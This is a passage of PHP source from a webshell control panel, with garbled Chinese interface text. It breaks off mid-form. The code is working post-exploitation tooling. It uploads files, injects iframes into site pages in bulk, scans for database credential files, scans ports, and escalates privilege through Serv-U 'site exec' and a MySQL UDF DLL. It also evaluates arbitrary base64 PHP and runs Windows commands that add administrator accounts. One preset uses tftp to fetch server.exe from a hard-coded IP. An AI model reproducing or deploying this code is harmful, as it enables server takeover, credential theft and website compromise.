            print "<SCRIPT language=\"JavaScript\">\r\nfunction addTank(){\r\nvar k=0;\r\n  k=k+1;\r\n  k=tank.rows.length;\r\n  newRow=document.all.tank.insertRow(-1)\r\n  <!--\xc9\xbe\xb3\xfd\xd1\xa1\xd4\xf1-->\r\n  newcell=newRow.insertCell()\r\n  newcell.innerHTML=\"<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>\"\r\n}\r\n\r\nfunction delTank() {\r\n  if(tank.rows.length==1) return;\r\n  var checkit = false;\r\n  for (var i=0;i<document.all.tankNo.length;i++) {\r\n    if (document.all.tankNo[i].checked) {\r\n      checkit=true;\r\n      tank.deleteRow(i+1);\r\n      i--;\r\n    }\r\n  }\r\n  if (checkit) {\r\n  } else{\r\n    alert(\"\xc7\xeb\xd1\xa1\xd4\xf1\xd2\xbb\xb8\xf6\xd2\xaa\xc9\xbe\xb3\xfd\xb5\xc4\xb6\xd4\xcf\xf3\");\r\n    return false;\r\n  }\r\n}\r\n</SCRIPT>\r\n<br><br>\r\n<table cellSpacing=0 cellPadding=0 width=\"100%\" border=0>       \r\n          <tr>\r\n            <td width=\"7%\"><input class=\"button01\" type=\"button\"  onclick=\"addTank()\" value=\" \xcc\xed \xbc\xd3 \" name=\"button2\"/>\r\n            <input name=\"button3\"  type=\"button\" class=\"button01\" onClick=\"delTank()\" value=\"\xc9\xbe\xb3\xfd\" />\r\n            </td>\r\n          </tr>\r\n</table>\r\n<table  id=\"tank\" width=\"100%\" border=\"0\" cellpadding=\"1\" cellspacing=\"1\" >\r\n<tr><td>\xc7\xeb\xd1\xa1\xd4\xf1\xd2\xaa\xc9\xcf\xb4\xab\xb5\xc4\xce\xc4\xbc\xfe\xa3\xba</td></tr>\r\n<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>\r\n</table>";
            html_n("<br><input type=\"submit\" name=\"upfiles\" value=\"\xc9\xcf\xb4\xab\" style=\"width:80px;\"> <input type=\"button\" value=\"\xb7\xb5\xbb\xd8\" onclick=\"window.location='?eanver=main&path=./';\" style=\"width:80px;\">");
            if ($_POST['upfiles']) {
                foreach ($_FILES["upfile"]["error"] as $key => $error) {
                    if ($error == UPLOAD_ERR_OK) {
                        $tmp_name = $_FILES["upfile"]["tmp_name"][$key];
                        $name = $_FILES["upfile"]["name"][$key];
                        $uploadfile = str_path($_POST['uppath'] . '/' . $name);
                        $upload = (@copy($tmp_name, $uploadfile) ? $name . $msg[2] : @move_uploaded_file($tmp_name, $uploadfile)) ? $name . $msg[2] : $name . $msg[3];
                        echo '<br><br>' . $upload;
                    }
                }
            }
            html_n('</form>');
            break;
        case "guama":
            $patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
            $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
            $codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";
            html_n('<tr><td>�ļ���������"|"��,Ҳ������ָ���ļ��.<form method="POST"><br>');
            html_input("text", "path", $patht, "\xc2\xb7\xbe\xb6\xb7\xb6\xce\xa7", "45");
            html_input("checkbox", "pass", "", "\xca\xb9\xd3\xc3\xc4\xbf\xc2\xbc\xb1\xe9\xc0\xfa", "", true);
            html_input("text", "type", $typet, "<br><br>\xce\xc4\xbc\xfe\xc0\xe0\xd0\xcd", "60");
            html_text("code", "67", "5", $codet);
            html_n('<br><br>');
            html_radio("\xc5\xfa\xc1\xbf\xb9\xd2\xc2\xed", "\xc5\xfa\xc1\xbf\xc7\xe5\xc2\xed", "guama", "qingma");
            html_input("submit", "passreturn", "\xbf\xaa\xca\xbc");
            html_n('</td></tr></form>');
            if (!empty($_POST['path'])) {
                html_n('<tr><td>Ŀ���ļ�:<br><br>');
                if (isset($_POST['pass'])) {
                    $bool = true;
                } else {
                    $bool = false;
                }
                do_passreturn($patht, $codet, $_POST['return'], $bool, $typet);
            }
            break;
        case "tihuan":
            html_n('<tr><td>�˹��ܿ�����滻�ļ�����,��С��ʹ��.<br><br><form method="POST">');
            html_input("text", "path", root_dir, "\xc2\xb7\xbe\xb6\xb7\xb6\xce\xa7", "45");
            html_input("checkbox", "pass", "", "\xca\xb9\xd3\xc3\xc4\xbf\xc2\xbc\xb1\xe9\xc0\xfa", "", true);
            html_text("newcode", "67", "5", $_POST['newcode']);
            html_n('<br><br>�滻Ϊ');
            html_text("oldcode", "67", "5", $_POST['oldcode']);
            html_input("submit", "passreturn", "\xcc\xe6\xbb\xbb", "<br><br>");
            html_n('</td></tr></form>');
            if (!empty($_POST['path'])) {
                html_n('<tr><td>Ŀ���ļ�:<br><br>');
                if (isset($_POST['pass'])) {
                    $bool = true;
                } else {
                    $bool = false;
                }
                do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']);
            }
            break;
        case "scanfile":
            css_js("4");
            html_n('<tr><td>�˹��ܿɺܷ�������������MYSQL�û�����������ļ�,������Ȩ.<br>��������ļ�̫��ʱ,��Ӱ��ִ���ٶ�,������ʹ��Ŀ¼��.<form method="POST" name="sform"><br>');
            html_input("text", "path", root_dir, "\xc2\xb7\xbe\xb6\xc3\xfb", "45");
            html_input("checkbox", "pass", "", "\xca\xb9\xd3\xc3\xc4\xbf\xc2\xbc\xb1\xe9\xc0\xfa", "", true);
            html_input("text", "code", $_POST['code'], "<br><br>\xb9\xd8\xbc\xfc\xd7\xd6", "40");
            html_select(array("--MYSQL\xc5\xe4\xd6\xc3\xce\xc4\xbc\xfe--", "Discuz", "PHPWind", "phpcms", "dedecms", "PHPBB", "wordpress", "sa-blog", "o-blog"), 0, "onchange='return Fulll(options[selectedIndex].value)'");
            html_n('<br><br>');
            html_radio("\xcb\xd1\xcb\xf7\xce\xc4\xbc\xfe\xc3\xfb", "\xcb\xd1\xcb\xf7\xb0\xfc\xba\xac\xce\xc4\xd7\xd6", "scanfile", "scancode");
            html_input("submit", "passreturn", "\xcb\xd1\xcb\xf7");
            html_n('</td></tr></form>');
            if (!empty($_POST['path'])) {
                html_n('<tr><td>�ҵ��ļ�:<br><br>');
                if (isset($_POST['pass'])) {
                    $bool = true;
                } else {
                    $bool = false;
                }
                do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool);
            }
            break;
        case "scanphp":
            html_n('<tr><td>ԭ���Ǹ�������붨���,��鿴�����жϺ��ٽ���ɾ��.<form method="POST"><br>');
            html_input("text", "path", root_dir, "\xb2\xe9\xd5\xd2\xb7\xb6\xce\xa7", "40");
            html_input("checkbox", "pass", "", "\xca\xb9\xd3\xc3\xc4\xbf\xc2\xbc\xb1\xe9\xc0\xfa<br><br>\xbd\xc5\xb1\xbe\xc0\xe0\xd0\xcd", "", true);
            html_select(array("php" => "PHP", "asp" => "ASP", "aspx" => "ASPX", "jsp" => "JSP"));
            html_input("submit", "passreturn", "\xb2\xe9\xd5\xd2", "<br><br>");
            html_n('</td></tr></form>');
            if (!empty($_POST['path'])) {
                html_n('<tr><td>�ҵ��ļ�:<br><br>');
                if (isset($_POST['pass'])) {
                    $bool = true;
                } else {
                    $bool = false;
                }
                do_passreturn($_POST['path'], $_POST['class'], "scanphp", $bool);
            }
            break;
        case "port":
            $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
            $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873';
            print <<<END
<form method="POST">
<div class="actall">\xc9\xa8\xc3\xe8IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
<div class="actall">\xb6\xcb\xbf\xda\xba\xc5 <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>
<div class="actall"><input type="submit" value="\xc9\xa8\xc3\xe8" style="width:80px;"></div>
</form>
END;
            if (!empty($_POST['ip']) && !empty($_POST['port'])) {
                echo "<div class=\"actall\">";
                $ports = explode('|', $_POST['port']);
                for ($i = 0; $i < count($ports); $i++) {
                    $fp = @fsockopen($_POST['ip'], $ports[$i], $errno, $errstr, 2);
                    echo $fp ? '<font color="#FF0000">���Ŷ˿� ---> ' . $ports[$i] . '</font><br>' : '�رն˿� ---> ' . $ports[$i] . '<br>';
                    ob_flush();
                    flush();
                }
                echo "</div>";
            }
            break;
        case "getcode":
            if (isset($_POST['url'])) {
                $proxycontents = @file_get_contents($_POST['url']);
                echo $proxycontents ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>\xbb\xf1\xc8\xa1 URL \xc4\xda\xc8\xdd\xca\xa7\xb0\xdc</b></p></center></body>";
                exit;
            }
            print <<<END
<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
 <form method="POST" target="proxyframe">
  <tr class="firstalt">
\t<td align="center"><b>\xd4\xda\xcf\xdf\xb4\xfa\xc0\xed</b></td>
  </tr>
  <tr class="secondalt">
\t<td align="center"  ><br><ul><li>\xd3\xc3\xb1\xbe\xb9\xa6\xc4\xdc\xbd\xf6\xca\xb5\xcf\xd6\xbc\xf2\xb5\xa5\xb5\xc4 HTTP \xb4\xfa\xc0\xed,\xb2\xbb\xbb\xe1\xcf\xd4\xca\xbe\xca\xb9\xd3\xc3\xcf\xe0\xb6\xd4\xc2\xb7\xbe\xb6\xb5\xc4\xcd\xbc\xc6\xac\xa1\xa2\xc1\xb4\xbd\xd3\xbc\xb0CSS\xd1\xf9\xca\xbd\xb1\xed.</li><li>\xd3\xc3\xb1\xbe\xb9\xa6\xc4\xdc\xbf\xc9\xd2\xd4\xcd\xa8\xb9\xfd\xb1\xbe\xb7\xfe\xce\xf1\xc6\xf7\xe4\xaf\xc0\xc0\xc4\xbf\xb1\xeaURL,\xb5\xab\xb2\xbb\xd6\xa7\xb3\xd6 SQL Injection \xcc\xbd\xb2\xe2\xd2\xd4\xbc\xb0\xc4\xb3\xd0\xa9\xcc\xd8\xca\xe2\xd7\xd6\xb7\xfb.</li><li>\xd3\xc3\xb1\xbe\xb9\xa6\xc4\xdc\xe4\xaf\xc0\xc0\xb5\xc4 URL,\xd4\xda\xc4\xbf\xb1\xea\xd6\xf7\xbb\xfa\xc9\xcf\xc1\xf4\xcf\xc2\xb5\xc4IP\xbc\xc7\xc2\xbc\xca\xc7 : {$_SERVER['SERVER_NAME']}</li></ul></td>
  </tr>
  <tr class="firstalt">
\t<td align="center" height=40  >URL: <input name="url" value="about:blank" type="text"  class="input" size="100" >
 <input name="" value="\xe4\xaf\xc0\xc0" type="submit"  class="input" size="30" >
</td>
  </tr>
  <tr class="secondalt">
\t<td align="center"  ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td>
  </tr>
</form></table>
END;
            break;
        case "servu":
            $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
            print <<<END
<div class="actall"><a href="?eanver=servu">[\xd6\xb4\xd0\xd0\xc3\xfc\xc1\xee]</a> <a href="?eanver=servu&o=adduser">[\xcc\xed\xbc\xd3\xd3\xc3\xbb\xa7]</a></div>
<form method="POST">
\t<div class="actall">ServU\xb6\xcb\xbf\xda <input name="SUPort" type="text" value="43958" style="width:300px"></div>
\t<div class="actall">ServU\xd3\xc3\xbb\xa7 <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
\t<div class="actall">ServU\xc3\xdc\xc2\xeb <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
END;
            if ($_GET['o'] == 'adduser') {
                print "<div class=\"actall\">\xd5\xca\xba\xc5 <input name=\"user\" type=\"text\" value=\"envl\" style=\"width:200px\">\r\n\xc3\xdc\xc2\xeb <input name=\"password\" type=\"text\" value=\"envl\" style=\"width:200px\">\r\n\xc4\xbf\xc2\xbc <input name=\"part\" type=\"text\" value=\"C:\\\\\" style=\"width:200px\"></div>";
            } else {
                print "<div class=\"actall\">\xcc\xe1\xc8\xa8\xc3\xfc\xc1\xee <input name=\"SUCommand\" type=\"text\" value=\"net user PHPINFO_CC PHPINFO_CC /add & net localgroup administrators PHPINFO_CC /add\" style=\"width:600px\"><br>\r\n<input name=\"user\" type=\"hidden\" value=\"envl\">\r\n<input name=\"password\" type=\"hidden\" value=\"envl\">\r\n<input name=\"part\" type=\"hidden\" value=\"C:\\\\\"></div>";
            }
            echo "<div class=\"actall\"><input type=\"submit\" value=\"\xd6\xb4\xd0\xd0\" style=\"width:80px;\"></div></form>";
            if (!empty($_POST['SUPort']) && !empty($_POST['SUUser']) && !empty($_POST['SUPass'])) {
                echo "<div class=\"actall\">";
                $sendbuf = "";
                $recvbuf = "";
                $domain = "-SETDOMAIN\r\n-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
                $adduser = "-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=21\r\n-User=" . $_POST['user'] . "\r\n" . "-Password=" . $_POST['password'] . "\r\n" . "-HomeDir=c:\\\r\n" . "-LoginMesFile=\r\n" . "-Disable=0\r\n" . "-RelPaths=1\r\n" . "-NeedSecure=0\r\n" . "-HideHidden=0\r\n" . "-AlwaysAllowLogin=0\r\n" . "-ChangePassword=0\r\n" . "-QuotaEnable=0\r\n" . "-MaxUsersLoginPerIP=-1\r\n" . "-SpeedLimitUp=0\r\n" . "-SpeedLimitDown=0\r\n" . "-MaxNrUsers=-1\r\n" . "-IdleTimeOut=600\r\n" . "-SessionTimeOut=-1\r\n" . "-Expire=0\r\n" . "-RatioUp=1\r\n" . "-RatioDown=1\r\n" . "-RatiosCredit=0\r\n" . "-QuotaCurrent=0\r\n" . "-QuotaMaximum=0\r\n" . "-Maintenance=None\r\n" . "-PasswordType=Regular\r\n" . "-Ratios=None\r\n" . " Access=" . $_POST['part'] . "\\|RWAMELCDP\r\n";
                $deldomain = "-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=21\r\n";
                $sock = @fsockopen("127.0.0.1", $_POST["SUPort"], $errno, $errstr, 10);
                $recvbuf = @fgets($sock, 1024);
                echo "\xb7\xb5\xbb\xd8\xca\xfd\xbe\xdd\xb0\xfc: {$recvbuf} <br>";
                $sendbuf = "USER " . $_POST["SUUser"] . "\r\n";
                @fputs($sock, $sendbuf, strlen($sendbuf));
                echo "\xb7\xa2\xcb\xcd\xca\xfd\xbe\xdd\xb0\xfc: {$sendbuf} <br>";
                $recvbuf = @fgets($sock, 1024);
                echo "\xb7\xb5\xbb\xd8\xca\xfd\xbe\xdd\xb0\xfc: {$recvbuf} <br>";
                $sendbuf = "PASS " . $_POST["SUPass"] . "\r\n";
                @fputs($sock, $sendbuf, strlen($sendbuf));
                echo "\xb7\xa2\xcb\xcd\xca\xfd\xbe\xdd\xb0\xfc: {$sendbuf} <br>";
                $recvbuf = @fgets($sock, 1024);
                echo "\xb7\xb5\xbb\xd8\xca\xfd\xbe\xdd\xb0\xfc: {$recvbuf} <br>";
                $sendbuf = "SITE MAINTENANCE\r\n";
                @fputs($sock, $sendbuf, strlen($sendbuf));
                echo "\xb7\xa2\xcb\xcd\xca\xfd\xbe\xdd\xb0\xfc: SITE MAINTENANCE\r\n <br>";
                $recvbuf = @fgets($sock, 1024);
                echo "\xb7\xb5\xbb\xd8\xca\xfd\xbe\xdd\xb0\xfc: {$recvbuf} <br>";
                $sendbuf = $domain;
                @fputs($sock, $sendbuf, strlen($sendbuf));
                echo "\xb7\xa2\xcb\xcd\xca\xfd\xbe\xdd\xb0\xfc: -SETDOMAIN\r\n-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n <br>";
                $recvbuf = @fgets($sock, 1024);
                echo "\xb7\xb5\xbb\xd8\xca\xfd\xbe\xdd\xb0\xfc: {$recvbuf} <br>";
                $sendbuf = $adduser;
                @fputs($sock, $sendbuf, strlen($sendbuf));
                echo "\xb7\xa2\xcb\xcd\xca\xfd\xbe\xdd\xb0\xfc: {$sendbuf} <br>";
                $recvbuf = @fgets($sock, 1024);
                echo "\xb7\xb5\xbb\xd8\xca\xfd\xbe\xdd\xb0\xfc: {$recvbuf} <br>";
                if (!empty($_POST['SUCommand'])) {
                    $exp = @fsockopen("127.0.0.1", "21", $errno, $errstr, 10);
                    $recvbuf = @fgets($exp, 1024);
                    echo "\xb7\xb5\xbb\xd8\xca\xfd\xbe\xdd\xb0\xfc: {$recvbuf} <br>";
                    $sendbuf = "USER " . $_POST['user'] . "\r\n";
                    @fputs($exp, $sendbuf, strlen($sendbuf));
                    echo "\xb7\xa2\xcb\xcd\xca\xfd\xbe\xdd\xb0\xfc: {$sendbuf} <br>";
                    $recvbuf = @fgets($exp, 1024);
                    echo "\xb7\xb5\xbb\xd8\xca\xfd\xbe\xdd\xb0\xfc: {$recvbuf} <br>";
                    $sendbuf = "PASS " . $_POST['password'] . "\r\n";
                    @fputs($exp, $sendbuf, strlen($sendbuf));
                    echo "\xb7\xa2\xcb\xcd\xca\xfd\xbe\xdd\xb0\xfc: {$sendbuf} <br>";
                    $recvbuf = @fgets($exp, 1024);
                    echo "\xb7\xb5\xbb\xd8\xca\xfd\xbe\xdd\xb0\xfc: {$recvbuf} <br>";
                    $sendbuf = "site exec " . $_POST["SUCommand"] . "\r\n";
                    @fputs($exp, $sendbuf, strlen($sendbuf));
                    echo "\xb7\xa2\xcb\xcd\xca\xfd\xbe\xdd\xb0\xfc: site exec <font color=#006600>" . $_POST["SUCommand"] . "</font> <br>";
                    $recvbuf = @fgets($exp, 1024);
                    echo "\xb7\xb5\xbb\xd8\xca\xfd\xbe\xdd\xb0\xfc: {$recvbuf} <br>";
                    $sendbuf = $deldomain;
                    @fputs($sock, $sendbuf, strlen($sendbuf));
                    echo "\xb7\xa2\xcb\xcd\xca\xfd\xbe\xdd\xb0\xfc: -DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=21\r\n <br>";
                    $recvbuf = @fgets($sock, 1024);
                    echo "\xb7\xb5\xbb\xd8\xca\xfd\xbe\xdd\xb0\xfc: {$recvbuf} <br>";
                    @fclose($exp);
                }
                @fclose($sock);
                echo "</div>";
            }
            break;
        case "phpcode":
            $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
            if ($phpcode != 'phpinfo();') {
                $phpcode = htmlspecialchars(base64_decode($phpcode));
            }
            echo "<script language=\"javascript\">";
            html_base();
            echo 'function SubmitUrl(){
			document.getElementById(\'phpcode\').value = base64encode(document.getElementById(\'phpcode\').value);
			document.getElementById(\'sendcode\').submit();
	}</script><tr><td><form method="POST" id="sendcode" >����д&lt;? ?&gt;��ǩ,�˹����Ż�ʹ��BASE64���ܴ��ͣ���ֹ�����뱻������˾�֪����ССϸ�ڣ�ע���ɾͣ�<br><br><textarea COLS="120" ROWS="35" name="phpcode" id="phpcode">' . $phpcode . '</textarea><br><br><input type="button" value="ִ��" onclick="SubmitUrl();" style="width:80px;">';
            if (!empty($_POST['phpcode'])) {
                echo "<br><br>";
                eval(stripslashes(base64_decode($_POST['phpcode'])));
            }
            html_n('</form>');
            break;
        case "myexp":
            $MSG_BOX = '���ȵ���DLL,��ִ�����.MYSQL�û�����ΪrootȨ��,����·�������ܼ���DLL�ļ�.<br>mysql5.1�汾��������mysql��Ŀ¼��װUDF�����ʧ��������NTFS-ADS�����ܴ����ļ���';
            $info = '������';
            $mhost = 'localhost';
            $muser = 'root';
            $mport = '3306';
            $mpass = '';
            $mdata = 'mysql';
            $mpath = 'C:/windows/mysqlDll.dll';
            $sqlcmd = 'ver';
            if (isset($_POST['mhost']) && isset($_POST['muser'])) {
                $mhost = $_POST['mhost'];
                $muser = $_POST['muser'];
                $mpass = $_POST['mpass'];
                $mdata = $_POST['mdata'];
                $mport = $_POST['mport'];
                $mpath = File_Str($_POST['mpath']);
                $sqlcmd = $_POST['sqlcmd'];
                $conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass);
                if ($conn) {
                    @mysql_select_db($mdata);
                    if (!empty($_POST['outdll']) && !empty($_POST['mpath'])) {
                        $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
                        if (@mysql_query($query, $conn)) {
                            $shellcode = Mysql_shellcode();
                            $query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));";
                            if (@mysql_query($query, $conn)) {
                                $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \'' . $mpath . '\';';
                                if (@mysql_query($query, $conn)) {
                                    $ap = explode('/', $mpath);
                                    $inpath = array_pop($ap);
                                    $query = 'Create Function state returns string soname \'' . $inpath . '\';';
                                    $MSG_BOX = @mysql_query($query, $conn) ? '��װDLL�ɹ�' : '��װDLLʧ��';
                                } else {
                                    $MSG_BOX = '����DLL�ļ�ʧ��';
                                }
                            } else {
                                $MSG_BOX = 'д���ʱ��ʧ��';
                            }
                            @mysql_query('DROP TABLE Envl_Temp_Tab;', $conn);
                        } else {
                            $MSG_BOX = '������ʱ��ʧ��';
                        }
                    }
                    if (!empty($_POST['runcmd'])) {
                        $query = 'select state("' . $sqlcmd . '");';
                        $result = @mysql_query($query, $conn);
                        if ($result) {
                            $k = 0;
                            $info = NULL;
                            while ($row = @mysql_fetch_array($result)) {
                                $infotmp .= $row[$k];
                                $k++;
                            }
                            $info = $infotmp;
                            $MSG_BOX = 'ִ�гɹ�';
                        } else {
                            $MSG_BOX = 'ִ��ʧ��';
                        }
                    }
                } else {
                    $MSG_BOX = '����MYSQLʧ��';
                }
            }
            print <<<END
<script language="javascript">
function Fullm(i){
\tStr = new Array(11);
\tStr[0] = "ver";
\tStr[1] = "net user PHPINFO_CC PHPINFO_CC /add";
\tStr[2] = "net localgroup administrators PHPINFO_CC /add";
\tStr[3] = "net start Terminal Services";
\tStr[4] = "tasklist /svc";
\tStr[5] = "netstat -ano";
\tStr[6] = "ipconfig";
\tStr[7] = "net user guest /active:yes";
\tStr[8] = "copy c:\\\\1.php d:\\\\2.php";
\tStr[9] = "tftp -i 219.134.46.245 get server.exe c:\\\\server.exe";
\tStr[10] = "net start telnet";
\tStr[11] = "shutdown -r -t 0";
\tmform.sqlcmd.value = Str[i];
\treturn true;
}
</script>
<form id="mform" method="POST">
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
<center><div class="actall">
\xb5\xd8\xd6\xb7 <input type="text" name="mhost" value="{$mhost}" style="width:110px">
\xb6\xcb\xbf\xda <input type="text" name="mport" value="{$mport}" style="width:110px">
\xd3\xc3\xbb\xa7 <input type="text" name="muser" value="{$muser}" style="width:110px">
\xc3\xdc\xc2\xeb <input type="text" name="mpass" value="{$mpass}" style="width:110px">
\xbf\xe2\xc3\xfb <input type="text" name="mdata" value="{$mdata}" style="width:110px">
</div><div class="actall">
\xbf\xc9\xbc\xd3\xd4\xd8\xc2\xb7\xbe\xb6 <input type="text" name="mpath" value="{$mpath}" style="width:555px"> 
<input type="submit" name="outdll" value="\xb0\xb2\xd7\xb0DLL" style="width:80px;"></div>
<div class="actall">\xb0\xb2\xd7\xb0\xb3\xc9\xb9\xa6\xba\xf3\xbf\xc9\xd3\xc3 <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:515px;">
<select onchange="return Fullm(options[selectedIndex].value)">
<option value="0" selected>--\xc3\xfc\xc1\xee\xbc\xaf\xba\xcf--</option>
<option value="1">\xcc\xed\xbc\xd3\xb9\xdc\xc0\xed\xd4\xb1</option>
<option value="2">\xc9\xe8\xce\xaa\xb9\xdc\xc0\xed\xd7\xe9</option>
<option value="3">\xbf\xaa\xc6\xf4\xd4\xb6\xb3\xcc\xd7\xc0\xc3\xe6</option>
<option value="4">\xb2\xe9\xbf\xb4\xbd\xf8\xb3\xcc\xba\xcdPID</option>
<option value="5">\xb2\xe9\xbf\xb4\xb6\xcb\xbf\xda\xba\xcdPID</option>
<option value="6">\xb2\xe9\xbf\xb4IP</option>
<option value="7">\xbc\xa4\xbb\xeeguest\xd5\xca\xbb\xa7</option>
<option value="8">\xb8\xb4\xd6\xc6\xce\xc4\xbc\xfe</option>
<option value="9">ftp\xcf\xc2\xd4\xd8</option>
<option value="10">\xbf\xaa\xc6\xf4telnet</option>
<option value="11">\xd6\xd8\xc6\xf4</option>
</select>
<input type="submit" name="runcmd" value="\xd6\xb4\xd0\xd0" style="width:80px;">
<textarea style="width:720px;height:300px;">{$info}</textarea>
</div></center>
</form>
END;
            break;
        case "mysql_exec":
            if (isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) {
                if (@mysql_connect($_POST['mhost'] . ':' . $_POST['mport'], $_POST['muser'], $_POST['mpass'])) {
                    $cookietime = time() + 86400;
                    setcookie('m_eanverhost', $_POST['mhost'], $cookietime);
                    setcookie('m_eanverport', $_POST['mport'], $cookietime);
                    setcookie('m_eanveruser', $_POST['muser'], $cookietime);
                    setcookie('m_eanverpass', $_POST['mpass'], $cookietime);
                    die('��ڵ�½,���Ժ�...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">');
                }
            }
            print "<form method=\"POST\" name=\"oform\" id=\"oform\">\r\n<div class=\"actall\">\xb5\xd8\xd6\xb7 <input type=\"text\" name=\"mhost\" value=\"localhost\" style=\"width:300px\"></div>\r\n<div class=\"actall\">\xb6\xcb\xbf\xda <input type=\"text\" name=\"mport\" value=\"3306\" style=\"width:300px\"></div>\r\n<div class=\"actall\">\xd3\xc3\xbb\xa7 <input type=\"text\" name=\"muser\" value=\"root\" style=\"width:300px\"></div>\r\n<div class=\"actall\">\xc3\xdc\xc2\xeb <input type=\"text\" name=\"mpass\" value=\"\" style=\"width:300px\"></div>\r\n<div class=\"actall\"><input type=\"submit\" value=\"\xb5\xc7\xc2\xbd\" style=\"width:80px;\"> <input type=\"button\" value=\"COOKIE\" style=\"width:80px;\" onclick=\"window.location='?eanver=mysql_msg';\"></div>\r\n</form>";
            break;
        case "winapi":
            //Windows���ӿ�
            //function winshell()
            //{
            $nop = '&nbsp;&nbsp;';
            if ($_GET['winshell'] == 'wscript') {
                $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
                $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
                print <<<END
<div class="actall">
<form action="?eanver=winapi&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD\xc2\xb7\xbe\xb6<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="\xd6\xb4\xd0\xd0" style="width:80px;">
<br><br><br></form></div>
END;
                if ($_POST['do'] == 'do') {
                    $ww = $wcpth . " /c " . $wcmd;
                    $phpwsh = new COM("Wscript.Shell") or die("\xb4\xb4\xbd\xa8Shell.Wscript\xd7\xe9\xbc\xfe\xca\xa7\xb0\xdc");
                    $phpexec = $phpwsh->exec($ww);
                    $execoutput = $wshexec->stdout();
                    $result = $execoutput->readall();
                    echo $result;
                    @$phpwsh->Release();
                    $phpwsh = NULL;
                }
            } elseif ($_GET['winshell'] == 'shelluser') {
                $wuser = $_POST['wuser'] ? $_POST['wuser'] : 'silic';
                $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
                print <<<END
<div class="actall">
<form action="?eanver=winapi&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users\xd7\xe9\xbc\xfe\xcc\xed\xbc\xd3\xb9\xdc\xc0\xed\xd4\xb1<br><br>
{$nop}\xd0\xc2\xbd\xa8\xd3\xc3\xbb\xa7\xc3\xfb\xa3\xba<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}\xd0\xc2\xd3\xc3\xbb\xa7\xc3\xdc\xc2\xeb\xa3\xba<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="\xcc\xed\xbc\xd3" style="width:80px;">
<br><br><br></form></div>
END;
                if ($_POST['do'] = 'do') {
                    $shell = new COM("Shell.Users");
                    $cmd = $shell->create($wuser);
                    $cmd->changePassword($wpasw, "");
                    $cmd->setting["AccountType"] = 3;
                }
            } elseif ($_GET['winshell'] == 'regedit') {
                $shell1 = new COM("wscript.shell") or die("require windows host");
                $action = isset($_POST['action']) ? $_POST['action'] : '';
                echo "<br>";
                echo "<div><h5>\xb6\xc1\xc8\xa1&\xd0\xb4\xc8\xeb&\xc9\xbe\xb3\xfd\xd7\xa2\xb2\xe1\xb1\xed</h5><br></div>";
                echo "<br>";
                print <<<END
<TR><form   action=""   method="post">   
<div><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>   
Rpath:&nbsp<input type="hidden" name="action" value="read">   
<input type="text" name="rpath" value="{$rpath}" size="70">   
<input class="bt" type="submit" value="\xb6\xc1\xc8\xa1"></form></TD></TR><br><br></div>   
END;
                $rpath = isset($_POST['rpath']) ? $_POST['rpath'] : '';
                $rpath = str_replace("\\\\", "\\", $rpath);
                if ($action == "read") {
                    $out = $shell1->RegRead($rpath);
                    echo '<pre>' . var_dump($out) . '</pre>';
                    echo "<br><br>";
                }
                print <<<END
<TR><form   action=""   method="post">   
<div><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>Wpath:      
<input type="text" name="wpath" value="{$wpath}" size="70"><BR><br> 
Wtype:&nbsp<input type="text" name="wtype" value="{$wtype}" size="20">
Wvalue:&nbsp<input type="text" name="wvalue" value="{$wvalue}" size="30">
<input type="hidden" name="action" value="\xd0\xb4\xc8\xeb">  
